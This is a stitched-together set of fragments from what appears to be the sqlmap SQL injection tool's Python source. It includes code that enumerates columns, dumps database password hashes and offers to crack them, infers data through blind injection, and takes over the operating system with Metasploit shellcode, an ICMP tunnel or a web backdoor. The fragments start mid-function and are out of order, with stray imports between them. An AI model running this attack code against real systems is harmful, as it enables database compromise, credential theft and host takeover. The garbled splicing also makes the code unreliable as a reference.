else: colCondParam = "='%s'" infoMsg += "'%s' " % ", ".join( unsafeSQLIdentificatorNaming(col) for col in sorted(colList)) condQueryStr = "%%s%s" % colCondParam condQuery = " AND (%s)" % " OR ".join( condQueryStr % (condition, unsafeSQLIdentificatorNaming(col)) for col in sorted(colList)) infoMsg += "for table '%s' " % unsafeSQLIdentificatorNaming( tbl) infoMsg += "in database '%s'" % unsafeSQLIdentificatorNaming( conf.db) logger.info(infoMsg) if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL, DBMS.HSQLDB): query = rootQuery.blind.count % ( unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db)) query += condQuery elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): query = rootQuery.blind.count % ( unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(conf.db.upper())) query += condQuery elif Backend.isDbms(DBMS.MSSQL): query = rootQuery.blind.count % (conf.db, conf.db, \ unsafeSQLIdentificatorNaming(tbl).split(".")[-1]) query += condQuery.replace("[DB]", conf.db) elif Backend.isDbms(DBMS.FIREBIRD): query = rootQuery.blind.count % (tbl) query += condQuery elif Backend.isDbms(DBMS.SQLITE): query = rootQuery.blind.query % tbl value = unArrayizeValue( inject.getValue(query, union=False, error=False)) parseSqliteTableSchema(value) return kb.data.cachedColumns count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) table = {} columns = {} if not isNumPosStrValue(count): if Backend.isDbms(DBMS.MSSQL): count, index, values = 0, 1, [] while True: query = rootQuery.blind.query3 % (conf.db, tbl, index) value = unArrayizeValue( inject.getValue(query, union=False, error=False)) if isNoneValue(value) or value == " ": break else: columns[safeSQLIdentificatorNaming( value)] = None index += 1 if not columns: errMsg = "unable to retrieve the %scolumns " % ( "number of " if not Backend.isDbms(DBMS.MSSQL) else "") errMsg += "for table '%s' " % unsafeSQLIdentificatorNaming( tbl) errMsg += "in database '%s'" % unsafeSQLIdentificatorNaming( conf.db) logger.error(errMsg) continue for index in getLimitRange(count): if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): query = rootQuery.blind.query % ( unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(conf.db)) query += condQuery field = None elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): query = rootQuery.blind.query % ( 
unsafeSQLIdentificatorNaming(tbl.upper()), unsafeSQLIdentificatorNaming(conf.db.upper())) query += condQuery field = None elif Backend.isDbms(DBMS.MSSQL): query = rootQuery.blind.query.replace( "'%s'", "'%s'" % unsafeSQLIdentificatorNaming(tbl).split(".")[-1] ).replace("%s", conf.db).replace("%d", str(index)) query += condQuery.replace("[DB]", conf.db) field = condition.replace("[DB]", conf.db) elif Backend.isDbms(DBMS.FIREBIRD): query = rootQuery.blind.query % (tbl) query += condQuery field = None query = agent.limitQuery(index, query, field, field) column = unArrayizeValue( inject.getValue(query, union=False, error=False)) if not isNoneValue(column): if conf.getComments: _ = queries[ Backend.getIdentifiedDbms()].column_comment if hasattr(_, "query"): if Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): query = _.query % ( unsafeSQLIdentificatorNaming( conf.db.upper()), unsafeSQLIdentificatorNaming( tbl.upper()), unsafeSQLIdentificatorNaming( column.upper())) else: query = _.query % ( unsafeSQLIdentificatorNaming(conf.db), unsafeSQLIdentificatorNaming(tbl), unsafeSQLIdentificatorNaming(column)) comment = unArrayizeValue( inject.getValue(query, union=False, error=False)) else: warnMsg = "on %s it is not " % Backend.getIdentifiedDbms( ) warnMsg += "possible to get column comments" singleTimeWarnMessage(warnMsg) if not onlyColNames: if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): query = rootQuery.blind.query2 % ( unsafeSQLIdentificatorNaming(tbl), column, unsafeSQLIdentificatorNaming(conf.db)) elif Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): query = rootQuery.blind.query2 % ( unsafeSQLIdentificatorNaming( tbl.upper()), column, unsafeSQLIdentificatorNaming( conf.db.upper())) elif Backend.isDbms(DBMS.MSSQL): query = rootQuery.blind.query2 % ( conf.db, conf.db, conf.db, conf.db, column, conf.db, conf.db, conf.db, unsafeSQLIdentificatorNaming(tbl).split( ".")[-1]) elif Backend.isDbms(DBMS.FIREBIRD): query = rootQuery.blind.query2 % (tbl, column) colType = unArrayizeValue( inject.getValue(query, union=False, error=False)) if Backend.isDbms(DBMS.FIREBIRD): colType = FIREBIRD_TYPES.get(colType, colType) column = safeSQLIdentificatorNaming(column) columns[column] = colType else: column = safeSQLIdentificatorNaming(column) columns[column] = None if columns: if conf.db in kb.data.cachedColumns: kb.data.cachedColumns[safeSQLIdentificatorNaming( conf.db)][safeSQLIdentificatorNaming( tbl, True)] = columns else: table[safeSQLIdentificatorNaming(tbl, True)] = columns kb.data.cachedColumns[safeSQLIdentificatorNaming( conf.db)] = table if not kb.data.cachedColumns: warnMsg = "unable to retrieve column names for " warnMsg += ("table '%s' " % unsafeSQLIdentificatorNaming(unArrayizeValue(tblList)) ) if len(tblList) == 1 else "any table " warnMsg += "in database '%s'" % unsafeSQLIdentificatorNaming( conf.db) logger.warn(warnMsg) if bruteForce is None: return self.getColumns(onlyColNames=onlyColNames, colTuple=colTuple, bruteForce=True) return kb.data.cachedColumns
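The in-band branch of getColumns() above assembles one information_schema lookup per table and optionally appends a column-name condition (condQuery). A minimal standalone sketch of that query construction, assuming a MySQL back-end and identifiers that were already validated elsewhere (build_column_query is a hypothetical helper, not part of sqlmap):

# Minimal sketch, assuming MySQL and pre-validated identifiers (hypothetical helper).
def build_column_query(db, table, columns=None):
    query = ("SELECT column_name, column_type FROM information_schema.columns "
             "WHERE table_name='%s' AND table_schema='%s'" % (table, db))
    if columns:
        # mirrors the condQuery construction above (one "=<name>" check per requested column)
        query += " AND (%s)" % " OR ".join("column_name='%s'" % col for col in sorted(columns))
    return query

print(build_column_query("testdb", "users", ["id", "name"]))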
def getPasswordHashes(self): infoMsg = "fetching database users password hashes" rootQuery = queries[Backend.getIdentifiedDbms()].passwords if conf.user == "CU": infoMsg += " for current user" conf.user = self.getCurrentUser() logger.info(infoMsg) if conf.user and Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2): conf.user = conf.user.upper() if conf.user: users = conf.user.split(",") if Backend.isDbms(DBMS.MYSQL): for user in users: parsedUser = re.search("[\047]*(.*?)[\047]*\@", user) if parsedUser: users[users.index(user)] = parsedUser.groups()[0] else: users = [] users = filter(None, users) if any( isTechniqueAvailable(_) for _ in (PAYLOAD.TECHNIQUE.UNION, PAYLOAD.TECHNIQUE.ERROR, PAYLOAD.TECHNIQUE.QUERY)) or conf.direct: if Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin( ("2005", "2008")): query = rootQuery.inband.query2 else: query = rootQuery.inband.query condition = rootQuery.inband.condition if conf.user: query += " WHERE " query += " OR ".join("%s = '%s'" % (condition, user) for user in sorted(users)) if Backend.isDbms(DBMS.SYBASE): randStr = randomStr() getCurrentThreadData().disableStdOut = True retVal = pivotDumpTable( "(%s) AS %s" % (query, randStr), ['%s.name' % randStr, '%s.password' % randStr], blind=False) if retVal: for user, password in filterPairValues( zip(retVal[0]["%s.name" % randStr], retVal[0]["%s.password" % randStr])): if user not in kb.data.cachedUsersPasswords: kb.data.cachedUsersPasswords[user] = [password] else: kb.data.cachedUsersPasswords[user].append(password) getCurrentThreadData().disableStdOut = False else: values = inject.getValue(query, blind=False, time=False) for user, password in filterPairValues(values): if not user or user == " ": continue password = parsePasswordHash(password) if user not in kb.data.cachedUsersPasswords: kb.data.cachedUsersPasswords[user] = [password] else: kb.data.cachedUsersPasswords[user].append(password) if not kb.data.cachedUsersPasswords and isInferenceAvailable( ) and not conf.direct: if not len(users): users = self.getUsers() if Backend.isDbms(DBMS.MYSQL): for user in users: parsedUser = re.search("[\047]*(.*?)[\047]*\@", user) if parsedUser: users[users.index(user)] = parsedUser.groups()[0] if Backend.isDbms(DBMS.SYBASE): getCurrentThreadData().disableStdOut = True randStr = randomStr() query = rootQuery.inband.query retVal = pivotDumpTable( "(%s) AS %s" % (query, randStr), ['%s.name' % randStr, '%s.password' % randStr], blind=True) if retVal: for user, password in filterPairValues( zip(retVal[0]["%s.name" % randStr], retVal[0]["%s.password" % randStr])): password = "******" % hexencode(password).upper() if user not in kb.data.cachedUsersPasswords: kb.data.cachedUsersPasswords[user] = [password] else: kb.data.cachedUsersPasswords[user].append(password) getCurrentThreadData().disableStdOut = False else: retrievedUsers = set() for user in users: user = unArrayizeValue(user) if user in retrievedUsers: continue infoMsg = "fetching number of password hashes " infoMsg += "for user '%s'" % user logger.info(infoMsg) if Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin( ("2005", "2008")): query = rootQuery.blind.count2 % user else: query = rootQuery.blind.count % user count = inject.getValue(query, union=False, error=False, expected=EXPECTED.INT, charsetType=CHARSET_TYPE.DIGITS) if not isNumPosStrValue(count): warnMsg = "unable to retrieve the number of password " warnMsg += "hashes for user '%s'" % user logger.warn(warnMsg) continue infoMsg = "fetching password hashes for user '%s'" % user 
logger.info(infoMsg) passwords = [] plusOne = Backend.getIdentifiedDbms() in (DBMS.ORACLE, DBMS.DB2) indexRange = getLimitRange(count, plusOne=plusOne) for index in indexRange: if Backend.isDbms(DBMS.MSSQL): if Backend.isVersionWithin(("2005", "2008")): query = rootQuery.blind.query2 % (user, index, user) else: query = rootQuery.blind.query % (user, index, user) else: query = rootQuery.blind.query % (user, index) password = unArrayizeValue( inject.getValue(query, union=False, error=False)) password = parsePasswordHash(password) passwords.append(password) if passwords: kb.data.cachedUsersPasswords[user] = passwords else: warnMsg = "unable to retrieve the password " warnMsg += "hashes for user '%s'" % user logger.warn(warnMsg) retrievedUsers.add(user) if not kb.data.cachedUsersPasswords: errMsg = "unable to retrieve the password hashes for the " errMsg += "database users (most probably because the session " errMsg += "user has no read privileges over the relevant " errMsg += "system database table)" logger.error(errMsg) else: for user in kb.data.cachedUsersPasswords: kb.data.cachedUsersPasswords[user] = list( set(kb.data.cachedUsersPasswords[user])) storeHashesToFile(kb.data.cachedUsersPasswords) message = "do you want to perform a dictionary-based attack " message += "against retrieved password hashes? [Y/n/q]" test = readInput(message, default="Y") if test[0] in ("n", "N"): pass elif test[0] in ("q", "Q"): raise SqlmapUserQuitException else: attackCachedUsersPasswords() return kb.data.cachedUsersPasswords
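For MySQL, getPasswordHashes() normalizes user names of the form 'user'@'host' down to the bare user before counting and fetching hashes. A small self-contained sketch of that normalization step, using the same pattern as above (the sample values are illustrative):

import re

# Strip surrounding quotes and the @host suffix, as done above for MySQL users.
for raw in ("'root'@'localhost'", "'app'@'%'"):
    parsed = re.search("[\047]*(.*?)[\047]*\@", raw)
    print(parsed.groups()[0] if parsed else raw)
# prints: root, then app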
def main(): """ Main function of sqlmap when running from command line. """ try: checkEnvironment() setPaths(modulePath()) banner() # Store original command line options for possible later restoration cmdLineOptions.update(cmdLineParser().__dict__) initOptions(cmdLineOptions) if hasattr(conf, "api"): # Overwrite system standard output and standard error to write # to an IPC database sys.stdout = StdDbOut(conf.taskid, messagetype="stdout") sys.stderr = StdDbOut(conf.taskid, messagetype="stderr") setRestAPILog() conf.showTime = True dataToStdout("[!] legal disclaimer: %s\n\n" % LEGAL_DISCLAIMER, forceOutput=True) dataToStdout("[*] starting at %s\n\n" % time.strftime("%X"), forceOutput=True) init() if conf.profile: profile() elif conf.smokeTest: smokeTest() elif conf.liveTest: liveTest() else: try: start() except thread.error as ex: if "can't start new thread" in getSafeExString(ex): errMsg = "unable to start new threads. Please check OS (u)limits" logger.critical(errMsg) raise SystemExit else: raise except SqlmapUserQuitException: errMsg = "user quit" try: logger.error(errMsg) except KeyboardInterrupt: pass except (SqlmapSilentQuitException, bdb.BdbQuit): pass except SqlmapShellQuitException: cmdLineOptions.sqlmapShell = False except SqlmapBaseException as ex: errMsg = getSafeExString(ex) try: logger.critical(errMsg) except KeyboardInterrupt: pass raise SystemExit except KeyboardInterrupt: print errMsg = "user aborted" try: logger.error(errMsg) except KeyboardInterrupt: pass except EOFError: print errMsg = "exit" try: logger.error(errMsg) except KeyboardInterrupt: pass except SystemExit: pass except: print errMsg = unhandledExceptionMessage() excMsg = traceback.format_exc() try: if not checkIntegrity(): errMsg = "code integrity check failed (turning off automatic issue creation). " errMsg += "You should retrieve the latest development version from official GitHub " errMsg += "repository at '%s'" % GIT_PAGE logger.critical(errMsg) print dataToStdout(excMsg) raise SystemExit elif "MemoryError" in excMsg: errMsg = "memory exhaustion detected" logger.error(errMsg) raise SystemExit elif any(_ in excMsg for _ in ("No space left", "Disk quota exceeded")): errMsg = "no space left on output device" logger.error(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("No such file", "_'", "self.get_prog_name()")): errMsg = "corrupted installation detected ('%s'). " % excMsg.strip().split('\n')[-1] errMsg += "You should retrieve the latest development version from official GitHub " errMsg += "repository at '%s'" % GIT_PAGE logger.error(errMsg) raise SystemExit elif "Read-only file system" in excMsg: errMsg = "output device is mounted as read-only" logger.error(errMsg) raise SystemExit elif "OperationalError: disk I/O error" in excMsg: errMsg = "I/O error on output device" logger.error(errMsg) raise SystemExit elif "_mkstemp_inner" in excMsg: errMsg = "there has been a problem while accessing temporary files" logger.error(errMsg) raise SystemExit elif "can't start new thread" in excMsg: errMsg = "there has been a problem while creating new thread instance. 
" errMsg += "Please make sure that you are not running too many processes" if not IS_WIN: errMsg += " (or increase the 'ulimit -u' value)" logger.error(errMsg) raise SystemExit elif all(_ in excMsg for _ in ("pymysql", "configparser")): errMsg = "wrong initialization of pymsql detected (using Python3 dependencies)" logger.error(errMsg) raise SystemExit elif "bad marshal data (unknown type code)" in excMsg: match = re.search(r"\s*(.+)\s+ValueError", excMsg) errMsg = "one of your .pyc files are corrupted%s" % (" ('%s')" % match.group(1) if match else "") errMsg += ". Please delete .pyc files on your system to fix the problem" logger.error(errMsg) raise SystemExit elif "valueStack.pop" in excMsg and kb.get("dumpKeyboardInterrupt"): raise SystemExit for match in re.finditer(r'File "(.+?)", line', excMsg): file_ = match.group(1) file_ = os.path.relpath(file_, os.path.dirname(__file__)) file_ = file_.replace("\\", '/') file_ = re.sub(r"\.\./", '/', file_).lstrip('/') excMsg = excMsg.replace(match.group(1), file_) errMsg = maskSensitiveData(errMsg) excMsg = maskSensitiveData(excMsg) if hasattr(conf, "api"): logger.critical("%s\n%s" % (errMsg, excMsg)) else: logger.critical(errMsg) kb.stickyLevel = logging.CRITICAL dataToStdout(excMsg) createGithubIssue(errMsg, excMsg) except KeyboardInterrupt: pass finally: kb.threadContinue = False if conf.get("showTime"): dataToStdout("\n[*] shutting down at %s\n\n" % time.strftime("%X"), forceOutput=True) kb.threadException = True if kb.get("tempDir"): for prefix in (MKSTEMP_PREFIX.IPC, MKSTEMP_PREFIX.TESTING, MKSTEMP_PREFIX.COOKIE_JAR, MKSTEMP_PREFIX.BIG_ARRAY): for filepath in glob.glob(os.path.join(kb.tempDir, "%s*" % prefix)): try: os.remove(filepath) except OSError: pass if not filter(None, (filepath for filepath in glob.glob(os.path.join(kb.tempDir, '*')) if not any(filepath.endswith(_) for _ in ('.lock', '.exe', '_')))): shutil.rmtree(kb.tempDir, ignore_errors=True) if conf.get("hashDB"): try: conf.hashDB.flush(True) except KeyboardInterrupt: pass if cmdLineOptions.get("sqlmapShell"): cmdLineOptions.clear() conf.clear() kb.clear() main() if hasattr(conf, "api"): try: conf.databaseCursor.disconnect() except KeyboardInterrupt: pass if conf.get("dumper"): conf.dumper.flush() # short delay for thread finalization try: _ = time.time() while threading.activeCount() > 1 and (time.time() - _) > THREAD_FINALIZATION_TIMEOUT: time.sleep(0.01) except KeyboardInterrupt: pass finally: # Reference: http://stackoverflow.com/questions/1635080/terminate-a-multi-thread-python-program if threading.activeCount() > 1: os._exit(0)
def read_file(self, filename, mode='r'):
    # Return the file's lines, or None (with an error logged) when the file is missing.
    if os.path.isfile(filename):
        with open(filename, mode) as f:
            return f.readlines()
    logger.error("File does not exist: %s" % filename)
    return None
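A hedged usage example for read_file(): the scanner object and the targets.txt file name are hypothetical, and since the method returns None for a missing file the result has to be checked before iterating.

# Hypothetical caller; 'scanner' stands for whatever object exposes read_file().
lines = scanner.read_file("targets.txt")
if lines is not None:
    for line in lines:
        print(line.strip())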
from lib.core.option import init
from lib.core.profiling import profile
from lib.core.settings import GIT_PAGE
from lib.core.settings import IS_WIN
from lib.core.settings import LEGAL_DISCLAIMER
from lib.core.settings import THREAD_FINALIZATION_TIMEOUT
from lib.core.settings import UNICODE_ENCODING
from lib.core.settings import VERSION
from lib.core.testing import smokeTest
from lib.core.testing import liveTest
from lib.parse.cmdline import cmdLineParser
from lib.utils.api import setRestAPILog
from lib.utils.api import StdDbOut
except KeyboardInterrupt:
    errMsg = "user aborted"
    logger.error(errMsg)
    raise SystemExit

def modulePath():
    """
    This will get us the program's directory, even if we are frozen
    using py2exe
    """

    try:
        _ = sys.executable if weAreFrozen() else __file__
    except NameError:
        _ = inspect.getsourcefile(modulePath)

    return getUnicode(os.path.dirname(os.path.realpath(_)), encoding=sys.getfilesystemencoding() or UNICODE_ENCODING)
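modulePath() resolves the program's own directory even when the program has been frozen with py2exe, so path lookups can be anchored to it. A short usage sketch (the joined sub-path is only an example):

import os

# Example only: build a path relative to the resolved program directory.
root = modulePath()
print(os.path.join(root, "lib", "core", "settings.py"))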
def osPwn(self): goUdf = False fallbackToWeb = False setupSuccess = False self.checkDbmsOs() if Backend.isOs(OS.WINDOWS): msg = "how do you want to establish the tunnel?" msg += "\n[1] TCP: Metasploit Framework (default)" msg += "\n[2] ICMP: icmpsh - ICMP tunneling" valids = (1, 2) while True: tunnel = readInput(msg, default=1) if isinstance(tunnel, basestring) and tunnel.isdigit() and int( tunnel) in valids: tunnel = int(tunnel) break elif isinstance(tunnel, int) and tunnel in valids: break else: warnMsg = "invalid value, valid values are 1 and 2" logger.warn(warnMsg) else: tunnel = 1 debugMsg = "the tunnel can be established only via TCP when " debugMsg += "the back-end DBMS is not Windows" logger.debug(debugMsg) if tunnel == 2: isAdmin = runningAsAdmin() if not isAdmin: errMsg = "you need to run sqlmap as an administrator " errMsg += "if you want to establish an out-of-band ICMP " errMsg += "tunnel because icmpsh uses raw sockets to " errMsg += "sniff and craft ICMP packets" raise SqlmapMissingPrivileges(errMsg) try: from impacket import ImpactDecoder from impacket import ImpactPacket except ImportError: errMsg = "sqlmap requires 'python-impacket' third-party library " errMsg += "in order to run icmpsh master. You can get it at " errMsg += "http://code.google.com/p/impacket/downloads/list" raise SqlmapMissingDependence(errMsg) sysIgnoreIcmp = "/proc/sys/net/ipv4/icmp_echo_ignore_all" if os.path.exists(sysIgnoreIcmp): fp = open(sysIgnoreIcmp, "wb") fp.write("1") fp.close() else: errMsg = "you need to disable ICMP replies by your machine " errMsg += "system-wide. For example run on Linux/Unix:\n" errMsg += "# sysctl -w net.ipv4.icmp_echo_ignore_all=1\n" errMsg += "If you miss doing that, you will receive " errMsg += "information from the database server and it " errMsg += "is unlikely to receive commands sent from you" logger.error(errMsg) if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): self.sysUdfs.pop("sys_bineval") self.getRemoteTempPath() if isStackingAvailable() or conf.direct: web = False self.initEnv(web=web) if tunnel == 1: if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): msg = "how do you want to execute the Metasploit shellcode " msg += "on the back-end database underlying operating system?" 
msg += "\n[1] Via UDF 'sys_bineval' (in-memory way, anti-forensics, default)" msg += "\n[2] Via shellcodeexec (file system way, preferred on 64-bit systems)" while True: choice = readInput(msg, default=1) if isinstance(choice, basestring) and choice.isdigit( ) and int(choice) in (1, 2): choice = int(choice) break elif isinstance(choice, int) and choice in (1, 2): break else: warnMsg = "invalid value, valid values are 1 and 2" logger.warn(warnMsg) if choice == 1: goUdf = True if goUdf: exitfunc = "thread" setupSuccess = True else: exitfunc = "process" self.createMsfShellcode(exitfunc=exitfunc, format="raw", extra="BufferRegister=EAX", encode="x86/alpha_mixed") if not goUdf: setupSuccess = self.uploadShellcodeexec(web=web) if setupSuccess is not True: if Backend.isDbms(DBMS.MYSQL): fallbackToWeb = True else: msg = "unable to mount the operating system takeover" raise SqlmapFilePathException(msg) if Backend.isOs(OS.WINDOWS) and Backend.isDbms( DBMS.MYSQL) and conf.privEsc: debugMsg = "by default MySQL on Windows runs as SYSTEM " debugMsg += "user, no need to privilege escalate" logger.debug(debugMsg) elif tunnel == 2: setupSuccess = self.uploadIcmpshSlave(web=web) if setupSuccess is not True: if Backend.isDbms(DBMS.MYSQL): fallbackToWeb = True else: msg = "unable to mount the operating system takeover" raise SqlmapFilePathException(msg) if not setupSuccess and Backend.isDbms( DBMS.MYSQL) and not conf.direct and (not isStackingAvailable() or fallbackToWeb): web = True if fallbackToWeb: infoMsg = "falling back to web backdoor to establish the tunnel" else: infoMsg = "going to use a web backdoor to establish the tunnel" logger.info(infoMsg) self.initEnv(web=web, forceInit=fallbackToWeb) if self.webBackdoorUrl: if not Backend.isOs(OS.WINDOWS) and conf.privEsc: # Unset --priv-esc if the back-end DBMS underlying operating # system is not Windows conf.privEsc = False warnMsg = "sqlmap does not implement any operating system " warnMsg += "user privilege escalation technique when the " warnMsg += "back-end DBMS underlying system is not Windows" logger.warn(warnMsg) if tunnel == 1: self.createMsfShellcode(exitfunc="process", format="raw", extra="BufferRegister=EAX", encode="x86/alpha_mixed") setupSuccess = self.uploadShellcodeexec(web=web) if setupSuccess is not True: msg = "unable to mount the operating system takeover" raise SqlmapFilePathException(msg) elif tunnel == 2: setupSuccess = self.uploadIcmpshSlave(web=web) if setupSuccess is not True: msg = "unable to mount the operating system takeover" raise SqlmapFilePathException(msg) if setupSuccess: if tunnel == 1: self.pwn(goUdf) elif tunnel == 2: self.icmpPwn() else: errMsg = "unable to prompt for an out-of-band session" raise SqlmapNotVulnerableException(errMsg) if not conf.cleanup: self.cleanup(web=web)
def runThreads(numThreads, threadFunction, cleanupFunction=None, forwardException=True, threadChoice=False, startThreadMsg=True): threads = [] kb.threadContinue = True kb.threadException = False if threadChoice and numThreads == 1 and not (kb.injection.data and not any(_ not in (PAYLOAD.TECHNIQUE.TIME, PAYLOAD.TECHNIQUE.STACKED) for _ in kb.injection.data)): while True: message = "please enter number of threads? [Enter for %d (current)] " % numThreads choice = readInput(message, default=str(numThreads)) if choice: skipThreadCheck = False if choice.endswith('!'): choice = choice[:-1] skipThreadCheck = True if choice.isdigit(): if int(choice) > MAX_NUMBER_OF_THREADS and not skipThreadCheck: errMsg = "maximum number of used threads is %d avoiding potential connection issues" % MAX_NUMBER_OF_THREADS logger.critical(errMsg) else: conf.threads = numThreads = int(choice) break if numThreads == 1: warnMsg = "running in a single-thread mode. This could take a while" logger.warn(warnMsg) try: if numThreads > 1: if startThreadMsg: infoMsg = "starting %d threads" % numThreads logger.info(infoMsg) else: threadFunction() return # Start the threads for numThread in xrange(numThreads): thread = threading.Thread(target=exceptionHandledFunction, name=str(numThread), args=[threadFunction]) setDaemon(thread) try: thread.start() except Exception as ex: errMsg = "error occurred while starting new thread ('%s')" % ex.message logger.critical(errMsg) break threads.append(thread) # And wait for them to all finish alive = True while alive: alive = False for thread in threads: if thread.isAlive(): alive = True time.sleep(0.1) except (KeyboardInterrupt, SqlmapUserQuitException) as ex: print() kb.prependFlag = False kb.threadContinue = False kb.threadException = True if numThreads > 1: logger.info("waiting for threads to finish%s" % (" (Ctrl+C was pressed)" if isinstance(ex, KeyboardInterrupt) else "")) try: while (threading.activeCount() > 1): pass except KeyboardInterrupt: raise SqlmapThreadException("user aborted (Ctrl+C was pressed multiple times)") if forwardException: raise except (SqlmapConnectionException, SqlmapValueException) as ex: print() kb.threadException = True logger.error("thread %s: %s" % (threading.currentThread().getName(), ex.message)) if conf.get("verbose") > 1: traceback.print_exc() except: from lib.core.common import unhandledExceptionMessage print() kb.threadException = True errMsg = unhandledExceptionMessage() logger.error("thread %s: %s" % (threading.currentThread().getName(), errMsg)) traceback.print_exc() finally: kb.bruteMode = False kb.threadContinue = True kb.threadException = False for lock in kb.locks.values(): if lock.locked(): try: lock.release() except: pass if conf.get("hashDB"): conf.hashDB.flush(True) if cleanupFunction: cleanupFunction()
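runThreads() starts daemonized worker threads and then polls until every worker has finished, rather than join()-ing each one, so Ctrl+C can interrupt the wait. A stripped-down sketch of that pattern with the sqlmap-specific kb/conf bookkeeping removed (run_workers is a hypothetical name):

import threading
import time

def run_workers(num_threads, worker):
    # Daemon threads so an aborted main thread does not hang on exit.
    threads = [threading.Thread(target=worker, name=str(_), daemon=True) for _ in range(num_threads)]
    for thread in threads:
        thread.start()
    # Poll instead of join() so a KeyboardInterrupt is handled promptly.
    while any(thread.is_alive() for thread in threads):
        time.sleep(0.1)

run_workers(4, lambda: time.sleep(0.5))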
def getChar(idx, charTbl=None, continuousOrder=True, expand=charsetType is None, shiftTable=None, retried=None): """ continuousOrder means that distance between each two neighbour's numerical values is exactly 1 """ result = tryHint(idx) if result: return result if charTbl is None: charTbl = type(asciiTbl)(asciiTbl) originalTbl = type(charTbl)(charTbl) if continuousOrder and shiftTable is None: # Used for gradual expanding into unicode charspace shiftTable = [2, 2, 3, 3, 5, 4] if "'%s'" % CHAR_INFERENCE_MARK in payload: for char in ('\n', '\r'): if ord(char) in charTbl: charTbl.remove(ord(char)) if not charTbl: return None elif len(charTbl) == 1: forgedPayload = safeStringFormat( payload.replace(INFERENCE_GREATER_CHAR, INFERENCE_EQUALS_CHAR), (expressionUnescaped, idx, charTbl[0])) result = Request.queryPage(forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) incrementCounter(kb.technique) if result: return decodeIntToUnicode(charTbl[0]) else: return None maxChar = maxValue = charTbl[-1] minValue = charTbl[0] firstCheck = False lastCheck = False unexpectedCode = False if continuousOrder: while len(charTbl) > 1: position = None if charsetType is None: if not firstCheck: try: try: lastChar = [ _ for _ in threadData.shared.value if _ is not None ][-1] except IndexError: lastChar = None else: if 'a' <= lastChar <= 'z': position = charTbl.index(ord('a') - 1) # 96 elif 'A' <= lastChar <= 'Z': position = charTbl.index(ord('A') - 1) # 64 elif '0' <= lastChar <= '9': position = charTbl.index(ord('0') - 1) # 47 except ValueError: pass finally: firstCheck = True elif not lastCheck and numThreads == 1: # not usable in multi-threading environment if charTbl[(len(charTbl) >> 1)] < ord(' '): try: # favorize last char check if current value inclines toward 0 position = charTbl.index(1) except ValueError: pass finally: lastCheck = True if position is None: position = (len(charTbl) >> 1) posValue = charTbl[position] falsePayload = None if "'%s'" % CHAR_INFERENCE_MARK not in payload: forgedPayload = safeStringFormat( payload, (expressionUnescaped, idx, posValue)) falsePayload = safeStringFormat( payload, (expressionUnescaped, idx, RANDOM_INTEGER_MARKER)) else: # e.g.: ... > '%c' -> ... > ORD(..) markingValue = "'%s'" % CHAR_INFERENCE_MARK unescapedCharValue = unescaper.escape( "'%s'" % decodeIntToUnicode(posValue)) forgedPayload = safeStringFormat( payload, (expressionUnescaped, idx)).replace( markingValue, unescapedCharValue) falsePayload = safeStringFormat( payload, (expressionUnescaped, idx)).replace( markingValue, NULL) if timeBasedCompare: if kb.responseTimeMode: kb.responseTimePayload = falsePayload else: kb.responseTimePayload = None result = Request.queryPage( forgedPayload, timeBasedCompare=timeBasedCompare, raise404=False) incrementCounter(kb.technique) if not timeBasedCompare: unexpectedCode |= threadData.lastCode not in ( kb.injection.data[kb.technique].falseCode, kb.injection.data[kb.technique].trueCode) if unexpectedCode: warnMsg = "unexpected HTTP code '%s' detected. 
Will use (extra) validation step in similar cases" % threadData.lastCode singleTimeWarnMessage(warnMsg) if result: minValue = posValue if not isinstance(charTbl, xrange): charTbl = charTbl[position:] else: # xrange() - extended virtual charset used for memory/space optimization charTbl = xrange(charTbl[position], charTbl[-1] + 1) else: maxValue = posValue if not isinstance(charTbl, xrange): charTbl = charTbl[:position] else: charTbl = xrange(charTbl[0], charTbl[position]) if len(charTbl) == 1: if maxValue == 1: return None # Going beyond the original charset elif minValue == maxChar: # If the original charTbl was [0,..,127] new one # will be [128,..,(128 << 4) - 1] or from 128 to 2047 # and instead of making a HUGE list with all the # elements we use a xrange, which is a virtual # list if expand and shiftTable: charTbl = xrange( maxChar + 1, (maxChar + 1) << shiftTable.pop()) originalTbl = xrange(charTbl) maxChar = maxValue = charTbl[-1] minValue = charTbl[0] else: return None else: retVal = minValue + 1 if retVal in originalTbl or ( retVal == ord('\n') and CHAR_INFERENCE_MARK in payload): if (timeBasedCompare or unexpectedCode ) and not validateChar(idx, retVal): if not kb.originalTimeDelay: kb.originalTimeDelay = conf.timeSec threadData.validationRun = 0 if (retried or 0) < MAX_REVALIDATION_STEPS: errMsg = "invalid character detected. retrying.." logger.error(errMsg) if timeBasedCompare: if kb.adjustTimeDelay is not ADJUST_TIME_DELAY.DISABLE: conf.timeSec += 1 warnMsg = "increasing time delay to %d second%s" % ( conf.timeSec, 's' if conf.timeSec > 1 else '') logger.warn(warnMsg) if kb.adjustTimeDelay is ADJUST_TIME_DELAY.YES: dbgMsg = "turning off time auto-adjustment mechanism" logger.debug(dbgMsg) kb.adjustTimeDelay = ADJUST_TIME_DELAY.NO return getChar(idx, originalTbl, continuousOrder, expand, shiftTable, (retried or 0) + 1) else: errMsg = "unable to properly validate last character value ('%s').." % decodeIntToUnicode( retVal) logger.error(errMsg) conf.timeSec = kb.originalTimeDelay return decodeIntToUnicode(retVal) else: if timeBasedCompare: threadData.validationRun += 1 if kb.adjustTimeDelay is ADJUST_TIME_DELAY.NO and threadData.validationRun 